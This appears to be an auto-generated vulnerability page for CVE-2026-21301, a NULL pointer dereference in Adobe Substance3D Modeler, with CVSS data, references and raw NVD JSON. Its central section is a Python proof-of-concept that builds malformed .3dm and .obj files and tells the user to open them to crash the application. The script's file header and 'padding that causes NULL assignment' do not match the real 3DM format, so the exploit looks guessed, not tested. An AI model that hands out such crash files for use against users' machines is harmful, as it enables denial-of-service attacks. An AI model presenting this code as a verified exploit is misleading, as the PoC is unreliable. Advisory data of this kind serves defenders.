CVE-2026-21301

Description

Substance3D - Modeler versions 1.22.4 and earlier are affected by a NULL Pointer Dereference vulnerability that could lead to application denial-of-service. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:substance_3d_modeler:*:*:*:*:*:*:*:* - VULNERABLE

Adobe Substance3D Modeler <= 1.22.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-21301 PoC - Adobe Substance3D Modeler NULL Pointer Dereference
# This PoC creates a malicious 3D model file that triggers NULL pointer dereference

import struct
import os

def create_malicious_3dm_file(filename):
    """
    Create a malicious .3dm file that triggers NULL pointer dereference
    in Adobe Substance3D Modeler versions <= 1.22.4
    """
    # RHINO 3DM file header structure
    magic = b'3DM'  # 3DM file magic number
    version = b'1.0 '  # Version field
    
    # Create minimal 3DM file with malformed data
    # The key is to create a file with specific byte patterns
    # that cause the parser to set a pointer to NULL
    
    malformed_data = bytearray()
    
    # File header (256 bytes)
    header = bytearray(256)
    header[0:3] = magic
    header[3:7] = version
    
    # Write version 1 chunk with malformed data
    malformed_data += b'\x00' * 100  # Padding that causes NULL assignment
    malformed_data += b'\xFF\xFF\xFF\xFF'  # Invalid size field
    malformed_data += b'\x00' * 200  # More padding
    
    # Write chunk header that triggers vulnerability
    chunk_type = b'\x00\x00\x00\x01'  # Type field
    chunk_size = b'\xFF\xFF\xFF\xFF'  # Oversized size
    chunk_data = b'\x00' * 500  # Malformed chunk data
    
    # Combine all parts
    with open(filename, 'wb') as f:
        f.write(header)
        f.write(chunk_type)
        f.write(chunk_size)
        f.write(chunk_data)
        f.write(malformed_data)
    
    print(f'[+] Created malicious file: {filename}')
    print(f'[+] File size: {os.path.getsize(filename)} bytes')

def create_malicious_obj_file(filename):
    """
    Alternative PoC: Create malformed OBJ file
    OBJ format is simpler and widely supported
    """
    # Malformed OBJ file with invalid vertex/normal indices
    obj_content = '''# Malformed OBJ file for CVE-2026-21301
# This file triggers NULL pointer dereference in Modeler

v 1.0 2.0 3.0
v 4.0 5.0 6.0
v 7.0 8.0 9.0

vn 0.0 1.0 0.0
vn 1.0 0.0 0.0

# Face with invalid references (negative or out of bounds)
f -1//-1 -2//-2 -3//-3
f 999999//999999 888888//888888 777777//777777

# Additional malformed data
g 
s off
l 999999 888888 777777
'''
    with open(filename, 'w') as f:
        f.write(obj_content)
    print(f'[+] Created malicious OBJ file: {filename}')

if __name__ == '__main__':
    print('=' * 60)
    print('CVE-2026-21301 PoC - Adobe Substance3D Modeler')
    print('NULL Pointer Dereference Vulnerability')
    print('=' * 60)
    
    # Create malicious files
    create_malicious_3dm_file('exploit_cve2026_21301.3dm')
    create_malicious_obj_file('exploit_cve2026_21301.obj')
    
    print('\n[!] Instructions:')
    print('1. Open the generated malicious file in Adobe Substance3D Modeler')
    print('2. The application should crash with access violation')
    print('3. This confirms the NULL pointer dereference vulnerability')
    print('=' * 60)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21301
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21301
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21301/
[4] VulDB https://vuldb.com/cve/CVE-2026-21301
[5] https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21301", "sourceIdentifier": "[email protected]", "published": "2026-01-13T21:15:53.793", "lastModified": "2026-01-14T17:58:10.387", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Substance3D - Modeler versions 1.22.4 and earlier are affected by a NULL Pointer Dereference vulnerability that could lead to application denial-of-service. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}, {"lang": "es", "value": "Las versiones 1.22.4 y anteriores de Substance3D - Modeler están afectadas por una vulnerabilidad de desreferencia de puntero nulo que podría conducir a una denegación de servicio de la aplicación. La explotación de este problema requiere interacción del usuario, ya que la víctima debe abrir un archivo malicioso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_modeler:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.22.5", "matchCriteriaId": "D5A6870D-D2DE-4B8F-8680-3717CA179D14"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}